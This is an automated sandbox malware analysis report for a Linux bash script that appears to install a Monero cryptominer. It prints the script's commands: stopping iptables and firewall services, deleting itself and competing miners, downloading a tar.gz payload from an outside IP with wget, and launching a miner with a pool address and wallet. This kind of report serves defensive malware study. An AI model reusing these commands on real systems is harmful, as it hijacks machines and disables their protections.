Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report L1fyFAYhE5

Overview

General Information

Joe Sandbox Version:24.0.0
Analysis ID:678655
Start date:03.10.2018
Start time:10:48:00
Joe Sandbox Product:Cloud
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:L1fyFAYhE5
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection:MAL
Classification:mal60.troj.evad.mine.lin@0/0@0/0

Detection

StrategyScoreRangeReportingDetection
Threshold600 - 100Report FP / FNmalicious

Classification

Signature Overview

Click to jump to signature section


Bitcoin Miner:

barindex
Found strings related to Crypto-MiningShow sources
Source: L1fyFAYhE5String found in binary or memory: ./minerm -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z -p x
Source: L1fyFAYhE5String found in binary or memory: ./999 -a cryptonight -o xmr -u 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z -p x -B
Source: L1fyFAYhE5String found in binary or memory: ./minerm -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z -p x

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.100:44274 -> 115.236.92.99:54321
Tries to stop the "iptables" serviceShow sources
Source: /usr/sbin/service (PID: 17728)Systemctl executable stopping iptables: /sbin/systemctl -> systemctl stop iptables.service
Source: /usr/sbin/service (PID: 17728)Systemctl executable stopping iptables: /bin/systemctl -> systemctl stop iptables.service
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Source: unknownTCP traffic detected without corresponding DNS query: 115.236.92.99
Executes the "wget" command typically used for HTTP/S downloadingShow sources
Source: /bin/bash (PID: 18102)Wget executable: /usr/bin/wget -> wget http://115.236.92.99:54321/mall.tar.gz
Urls found in memory or binary dataShow sources
Source: L1fyFAYhE5String found in binary or memory: http://115.236.92.99:54321/mall.tar.gz

System Summary:

barindex
Sample contains strings that are potentially command stringsShow sources
Source: Initial samplePotential command found: service iptables stop
Source: Initial samplePotential command found: rm -f /tmp/httpdlog/*.gz
Source: Initial samplePotential command found: rm -f *.gz
Source: Initial samplePotential command found: rm -f *.sh
Source: Initial samplePotential command found: rm -f $0
Source: Initial samplePotential command found: killall -9 daemon.armv4l.mod
Source: Initial samplePotential command found: killall -9 daemon.i686.mod
Source: Initial samplePotential command found: killall -9 daemon.mips.mod
Source: Initial samplePotential command found: killall -9 daemon.mipsel.mod
Source: Initial samplePotential command found: killall -9 test.mod
Source: Initial samplePotential command found: killall -9 btminerd
Source: Initial samplePotential command found: killall -9 os64
Source: Initial samplePotential command found: killall -9 os32
Source: Initial samplePotential command found: killall -9 xptminer2
Source: Initial samplePotential command found: killall -9 xptminer
Source: Initial samplePotential command found: killall -9 minerd
Source: Initial samplePotential command found: killall -9 mstrie
Source: Initial samplePotential command found: killall -9 mstxcn
Source: Initial samplePotential command found: killall -9 mstbit
Source: Initial samplePotential command found: killall -9 mstbtc
Source: Initial samplePotential command found: killall -9 ethermine
Source: Initial samplePotential command found: killall -9 zcash
Source: Initial samplePotential command found: killall -9 xxj
Source: Initial samplePotential command found: killall -9 yam
Source: Initial samplePotential command found: killall -9 metacity
Source: Initial samplePotential command found: killall -9 nautilus
Source: Initial samplePotential command found: rm -f /tmp/.httpdlog*.gz
Source: Initial samplePotential command found: echo "yes"
Source: Initial samplePotential command found: mkdir /tmp/.httpdlog
Source: Initial samplePotential command found: cd /tmp/.httpdlog
Source: Initial samplePotential command found: wget http://115.236.92.99:54321/mall.tar.gz
Source: Initial samplePotential command found: tar zxvf mall.tar.gz
Source: Initial samplePotential command found: chmod 777 m7xmr
Source: Initial samplePotential command found: chmod 777 minerm
Source: Initial samplePotential command found: chmod 777 mstxmr
Source: Initial samplePotential command found: chmod 777 ./m7xmr
Source: Initial samplePotential command found: chmod 777 ./minerm
Source: Initial samplePotential command found: chmod 777 ./mstxmr
Source: Initial samplePotential command found: chmod 777 999
Source: Initial samplePotential command found: chmod 777 ALib
Source: Initial samplePotential command found: chmod 777 ./999
Source: Initial samplePotential command found: chmod 777 ./ALib
Source: Initial samplePotential command found: echo "ok"
Classification labelShow sources
Source: classification engineClassification label: mal60.troj.evad.mine.lin@0/0@0/0

Persistence and Installation Behavior:

barindex
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/bash (PID: 18010)Rm executable: /bin/rm -> rm -f /tmp/httpdlog/*.gz
Source: /bin/bash (PID: 18015)Rm executable: /bin/rm -> rm -f *.gz
Source: /bin/bash (PID: 18020)Rm executable: /bin/rm -> rm -f *.sh
Source: /bin/bash (PID: 18032)Rm executable: /bin/rm -> rm -f /tmp/L1fyFAYhE5
Tries to stop the "iptables" serviceShow sources
Source: /usr/sbin/service (PID: 17728)Systemctl executable stopping iptables: /sbin/systemctl -> systemctl stop iptables.service
Source: /usr/sbin/service (PID: 17728)Systemctl executable stopping iptables: /bin/systemctl -> systemctl stop iptables.service
Creates hidden files and/or directoriesShow sources
Source: /bin/mkdir (PID: 18101)Directory: /tmp/.httpdlog
Enumerates processes within the "proc" file systemShow sources
Source: /bin/ps (PID: 18040)File opened: /proc/17200/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17200/status
Source: /bin/ps (PID: 18040)File opened: /proc/17200/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17321/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17321/status
Source: /bin/ps (PID: 18040)File opened: /proc/17321/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17289/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17289/status
Source: /bin/ps (PID: 18040)File opened: /proc/17289/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17284/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17284/status
Source: /bin/ps (PID: 18040)File opened: /proc/17284/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/2396/stat
Source: /bin/ps (PID: 18040)File opened: /proc/2396/status
Source: /bin/ps (PID: 18040)File opened: /proc/2396/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17160/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17160/status
Source: /bin/ps (PID: 18040)File opened: /proc/17160/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17161/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17161/status
Source: /bin/ps (PID: 18040)File opened: /proc/17161/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/1180/stat
Source: /bin/ps (PID: 18040)File opened: /proc/1180/status
Source: /bin/ps (PID: 18040)File opened: /proc/1180/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17208/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17208/status
Source: /bin/ps (PID: 18040)File opened: /proc/17208/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17329/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17329/status
Source: /bin/ps (PID: 18040)File opened: /proc/17329/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/16875/stat
Source: /bin/ps (PID: 18040)File opened: /proc/16875/status
Source: /bin/ps (PID: 18040)File opened: /proc/16875/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17204/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17204/status
Source: /bin/ps (PID: 18040)File opened: /proc/17204/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/2308/stat
Source: /bin/ps (PID: 18040)File opened: /proc/2308/status
Source: /bin/ps (PID: 18040)File opened: /proc/2308/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17206/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17206/status
Source: /bin/ps (PID: 18040)File opened: /proc/17206/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/10/stat
Source: /bin/ps (PID: 18040)File opened: /proc/10/status
Source: /bin/ps (PID: 18040)File opened: /proc/10/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/11/stat
Source: /bin/ps (PID: 18040)File opened: /proc/11/status
Source: /bin/ps (PID: 18040)File opened: /proc/11/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17211/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17211/status
Source: /bin/ps (PID: 18040)File opened: /proc/17211/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/12/stat
Source: /bin/ps (PID: 18040)File opened: /proc/12/status
Source: /bin/ps (PID: 18040)File opened: /proc/12/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17179/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17179/status
Source: /bin/ps (PID: 18040)File opened: /proc/17179/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/13/stat
Source: /bin/ps (PID: 18040)File opened: /proc/13/status
Source: /bin/ps (PID: 18040)File opened: /proc/13/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17334/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17334/status
Source: /bin/ps (PID: 18040)File opened: /proc/17334/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/14/stat
Source: /bin/ps (PID: 18040)File opened: /proc/14/status
Source: /bin/ps (PID: 18040)File opened: /proc/14/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/9475/stat
Source: /bin/ps (PID: 18040)File opened: /proc/9475/status
Source: /bin/ps (PID: 18040)File opened: /proc/9475/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17214/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17214/status
Source: /bin/ps (PID: 18040)File opened: /proc/17214/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/15/stat
Source: /bin/ps (PID: 18040)File opened: /proc/15/status
Source: /bin/ps (PID: 18040)File opened: /proc/15/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/16/stat
Source: /bin/ps (PID: 18040)File opened: /proc/16/status
Source: /bin/ps (PID: 18040)File opened: /proc/16/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17/status
Source: /bin/ps (PID: 18040)File opened: /proc/17/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/18/stat
Source: /bin/ps (PID: 18040)File opened: /proc/18/status
Source: /bin/ps (PID: 18040)File opened: /proc/18/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17210/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17210/status
Source: /bin/ps (PID: 18040)File opened: /proc/17210/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/19/stat
Source: /bin/ps (PID: 18040)File opened: /proc/19/status
Source: /bin/ps (PID: 18040)File opened: /proc/19/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/17170/stat
Source: /bin/ps (PID: 18040)File opened: /proc/17170/status
Source: /bin/ps (PID: 18040)File opened: /proc/17170/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/1194/stat
Source: /bin/ps (PID: 18040)File opened: /proc/1194/status
Source: /bin/ps (PID: 18040)File opened: /proc/1194/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/1/stat
Source: /bin/ps (PID: 18040)File opened: /proc/1/status
Source: /bin/ps (PID: 18040)File opened: /proc/1/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/2/stat
Source: /bin/ps (PID: 18040)File opened: /proc/2/status
Source: /bin/ps (PID: 18040)File opened: /proc/2/cmdline
Source: /bin/ps (PID: 18040)File opened: /proc/2315/stat
Source: /bin/ps (PID: 18040)File opened: /proc/2315/status
Source: /bin/ps (PID: 18040)File opened: /proc/2315/cmdline
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/bash (PID: 18041)Grep executable: /bin/grep -> grep 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z
Source: /bin/bash (PID: 18042)Grep executable: /bin/grep -> grep -v grep
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/bash (PID: 18101)Mkdir executable: /bin/mkdir -> mkdir /tmp/.httpdlog
Executes the "ps" command used to list the status of processesShow sources
Source: /bin/bash (PID: 18040)Ps executable: /bin/ps -> ps -ef
Executes the "systemctl" command used for controlling the systemd system and service managerShow sources
Source: /usr/sbin/service (PID: 17728)Systemctl executable: /bin/systemctl -> systemctl stop iptables.service
Source: /usr/sbin/service (PID: 17731)Systemctl executable: /bin/systemctl -> systemctl --quiet is-active multi-user.target
Source: /usr/sbin/service (PID: 17733)Systemctl executable: /bin/systemctl -> systemctl list-unit-files --full --type=socket
Source: /usr/sbin/service (PID: 17791)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show acpid.socket
Source: /usr/sbin/service (PID: 17792)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show apport-forward.socket
Source: /usr/sbin/service (PID: 17796)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show avahi-daemon.socket
Source: /usr/sbin/service (PID: 17803)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show cups.socket
Source: /usr/sbin/service (PID: 17823)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dbus.socket
Source: /usr/sbin/service (PID: 17834)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show dm-event.socket
Source: /usr/sbin/service (PID: 17838)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmetad.socket
Source: /usr/sbin/service (PID: 17847)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lvm2-lvmpolld.socket
Source: /usr/sbin/service (PID: 17858)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show lxd.socket
Source: /usr/sbin/service (PID: 17865)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show saned.socket
Source: /usr/sbin/service (PID: 17874)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show snapd.socket
Source: /usr/sbin/service (PID: 17883)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show ssh.socket
Source: /usr/sbin/service (PID: 17895)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show syslog.socket
Source: /usr/sbin/service (PID: 17903)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-bus-proxyd.socket
Source: /usr/sbin/service (PID: 17910)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-fsckd.socket
Source: /usr/sbin/service (PID: 17921)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-initctl.socket
Source: /usr/sbin/service (PID: 17932)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-audit.socket
Source: /usr/sbin/service (PID: 17941)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald-dev-log.socket
Source: /usr/sbin/service (PID: 17950)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-journald.socket
Source: /usr/sbin/service (PID: 17954)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-networkd.socket
Source: /usr/sbin/service (PID: 17961)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-rfkill.socket
Source: /usr/sbin/service (PID: 17972)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-control.socket
Source: /usr/sbin/service (PID: 17987)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show systemd-udevd-kernel.socket
Source: /usr/sbin/service (PID: 17993)Systemctl executable: /bin/systemctl -> systemctl -p Triggers show uuidd.socket
Executes the "wget" command typically used for HTTP/S downloadingShow sources
Source: /bin/bash (PID: 18102)Wget executable: /usr/bin/wget -> wget http://115.236.92.99:54321/mall.tar.gz
Reads system information from the proc file systemShow sources
Source: /bin/ps (PID: 18040)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 18040)Reads from proc file: /proc/stat

Hooking and other Techniques for Hiding and Protection:

barindex
Sample deletes itselfShow sources
Source: /bin/rm (PID: 18032)File: /tmp/L1fyFAYhE5


Runtime Messages

Command:bash "/tmp/L1fyFAYhE5"
Exit Code:
Exit Code Info:
Killed:True
Standard Output:
Standard Error:/tmp/L1fyFAYhE5: line 1: #!/bin/bash: No such file or directory
/tmp/L1fyFAYhE5: line 2: /etc/init.d/iptables: No such file or directory
Failed to stop iptables.service: Unit iptables.service not loaded.
/tmp/L1fyFAYhE5: line 4: SuSEfirewall2: command not found
/tmp/L1fyFAYhE5: line 5: reSuSEfirewall2: command not found
--2018-10-03 12:49:11-- http://115.236.92.99:54321/mall.tar.gz

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 678655 Sample: L1fyFAYhE5 Startdate: 03/10/2018 Architecture: LINUX Score: 60 38 115.236.92.99, 54321 CHINANET-BACKBONENo31Jin-rongStreetCN China 2->38 40 Found strings related to Crypto-Mining 2->40 9 bash 2->9         started        signatures3 42 Detected TCP or UDP traffic on non-standard ports 38->42 process4 process5 11 bash service systemctl 9->11         started        14 bash rm 9->14         started        16 bash rm 9->16         started        18 9 other processes 9->18 signatures6 44 Tries to stop the "iptables" service 11->44 20 service 11->20         started        22 service basename 11->22         started        24 service basename 11->24         started        32 25 other processes 11->32 46 Sample deletes itself 14->46 48 Executes the "rm" command used to delete files or directories 14->48 26 bash ps 18->26         started        28 bash grep 18->28         started        30 bash grep 18->30         started        process7 process8 34 service systemctl 20->34         started        36 service sed 20->36         started       

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Startup

  • system is lnxubuntu1
  • bash (PID: 17713, Parent: 17667, MD5: 5e666695cf08d1638bb85684e30185ee)
    • bash New Fork (PID: 17726, Parent: 17713)
    • bash New Fork (PID: 17727, Parent: 17713)
    • bash New Fork (PID: 17728, Parent: 17713)
    • service (PID: 17728, Parent: 17713, MD5: 81c4fe604ec67916db7b223725e5a9c6)
      • service New Fork (PID: 17729, Parent: 17728)
      • basename (PID: 17729, Parent: 17728, MD5: fd7bba8b11b99ec7559f30226c79a729)
      • service New Fork (PID: 17730, Parent: 17728)
      • basename (PID: 17730, Parent: 17728, MD5: fd7bba8b11b99ec7559f30226c79a729)
      • service New Fork (PID: 17731, Parent: 17728)
      • systemctl (PID: 17731, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17732, Parent: 17728)
        • service New Fork (PID: 17733, Parent: 17732)
        • systemctl (PID: 17733, Parent: 17732, MD5: b08096235b8c90203e17721264b5ce40)
        • service New Fork (PID: 17734, Parent: 17732)
        • sed (PID: 17734, Parent: 17732, MD5: c1a00c583ba08e728b10f3f46f5776d6)
      • service New Fork (PID: 17791, Parent: 17728)
      • systemctl (PID: 17791, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17792, Parent: 17728)
      • systemctl (PID: 17792, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17796, Parent: 17728)
      • systemctl (PID: 17796, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17803, Parent: 17728)
      • systemctl (PID: 17803, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17823, Parent: 17728)
      • systemctl (PID: 17823, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17834, Parent: 17728)
      • systemctl (PID: 17834, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17838, Parent: 17728)
      • systemctl (PID: 17838, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17847, Parent: 17728)
      • systemctl (PID: 17847, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17858, Parent: 17728)
      • systemctl (PID: 17858, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17865, Parent: 17728)
      • systemctl (PID: 17865, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17874, Parent: 17728)
      • systemctl (PID: 17874, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17883, Parent: 17728)
      • systemctl (PID: 17883, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17895, Parent: 17728)
      • systemctl (PID: 17895, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17903, Parent: 17728)
      • systemctl (PID: 17903, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17910, Parent: 17728)
      • systemctl (PID: 17910, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17921, Parent: 17728)
      • systemctl (PID: 17921, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17932, Parent: 17728)
      • systemctl (PID: 17932, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17941, Parent: 17728)
      • systemctl (PID: 17941, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17950, Parent: 17728)
      • systemctl (PID: 17950, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17954, Parent: 17728)
      • systemctl (PID: 17954, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17961, Parent: 17728)
      • systemctl (PID: 17961, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17972, Parent: 17728)
      • systemctl (PID: 17972, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17987, Parent: 17728)
      • systemctl (PID: 17987, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
      • service New Fork (PID: 17993, Parent: 17728)
      • systemctl (PID: 17993, Parent: 17728, MD5: b08096235b8c90203e17721264b5ce40)
    • systemctl (PID: 17728, Parent: 17713, MD5: b08096235b8c90203e17721264b5ce40)
    • bash New Fork (PID: 18003, Parent: 17713)
    • bash New Fork (PID: 18007, Parent: 17713)
    • bash New Fork (PID: 18010, Parent: 17713)
    • rm (PID: 18010, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18015, Parent: 17713)
    • rm (PID: 18015, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18020, Parent: 17713)
    • rm (PID: 18020, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18032, Parent: 17713)
    • rm (PID: 18032, Parent: 17713, MD5: b79876063d894c449856cca508ecca7f)
    • bash New Fork (PID: 18034, Parent: 17713)
      • bash New Fork (PID: 18040, Parent: 18034)
      • ps (PID: 18040, Parent: 18034, MD5: 37339e5441057d422e61e8a471505337)
      • bash New Fork (PID: 18041, Parent: 18034)
      • grep (PID: 18041, Parent: 18034, MD5: fc9b0a0ff848b35b3716768695bf2427)
      • bash New Fork (PID: 18042, Parent: 18034)
      • grep (PID: 18042, Parent: 18034, MD5: fc9b0a0ff848b35b3716768695bf2427)
    • bash New Fork (PID: 18101, Parent: 17713)
    • mkdir (PID: 18101, Parent: 17713, MD5: a97f666f21c85ec62ea47d022263ef41)
    • bash New Fork (PID: 18102, Parent: 17713)
    • wget (PID: 18102, Parent: 17713, MD5: 458ce58ac4b1aac3eafc287fa46bf92d)
  • cleanup

Created / dropped Files

No created / dropped files found

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://115.236.92.99:54321/mall.tar.gzL1fyFAYhE5false
    		unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPCountryFlagASNASN NameMalicious
    115.236.92.99China
    		4134CHINANET-BACKBONENo31Jin-rongStreetCNtrue

    Static File Info

    General

    File type:UTF-8 Unicode (with BOM) text
    Entropy (8bit):5.528162830997711
    TrID:
    • Text - UTF-8 encoded (3003/1) 100.00%
    File name:L1fyFAYhE5
    File size:2014
    MD5:94bfedc1dd3a8e3760fca3229a573464
    SHA1:483573dbbd40e0af67e18b67105cbd4af7d2e5f9
    SHA256:e094df700e7c3523fffcaafe55b26ec52dc0c123a5e2e0779904b42f9d8d0739
    SHA512:70a6621079189ed11a61495aeeb84f63ad29f39689f312334efad7174b44e815fd232cb599e369bbd5f2050a47000f337a1f9236d45ed6a63139d6db9d713c4c
    File Content Preview:...#!/bin/bash./etc/init.d/iptables stop.service iptables stop.SuSEfirewall2 stop.reSuSEfirewall2 stop.rm -f /tmp/httpdlog/*.gz.rm -f *.gz.rm -f *.sh.rm -f $0.ret=`ps -ef|grep 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8Y

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Okt 3, 2018 10:49:13.030000925 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:49:14.026628017 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:49:16.030488968 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:49:20.038564920 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:49:28.054533958 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:49:44.070491076 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:50:16.134579897 MESZ4427454321192.168.1.100115.236.92.99
    Okt 3, 2018 10:52:23.213716030 MESZ6081553192.168.1.1008.8.8.8
    Okt 3, 2018 10:52:23.214348078 MESZ3902953192.168.1.1008.8.8.8
    Okt 3, 2018 10:52:23.226145029 MESZ53608158.8.8.8192.168.1.100
    Okt 3, 2018 10:52:23.226608992 MESZ53390298.8.8.8192.168.1.100

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Okt 3, 2018 10:52:23.213716030 MESZ6081553192.168.1.1008.8.8.8
    Okt 3, 2018 10:52:23.214348078 MESZ3902953192.168.1.1008.8.8.8
    Okt 3, 2018 10:52:23.226145029 MESZ53608158.8.8.8192.168.1.100
    Okt 3, 2018 10:52:23.226608992 MESZ53390298.8.8.8192.168.1.100

    System Behavior

    Analysis Process: bash PID: 17713 Parent PID: 17667

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:/bin/bash /tmp/L1fyFAYhE5
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: bash PID: 17726 Parent PID: 17713

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: bash PID: 17727 Parent PID: 17713

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: bash PID: 17728 Parent PID: 17713

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: service PID: 17728 Parent PID: 17713

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:/bin/sh /usr/sbin/service iptables stop
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: service PID: 17729 Parent PID: 17728

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: basename PID: 17729 Parent PID: 17728

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Chronological Activities

    Analysis Process: service PID: 17730 Parent PID: 17728

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

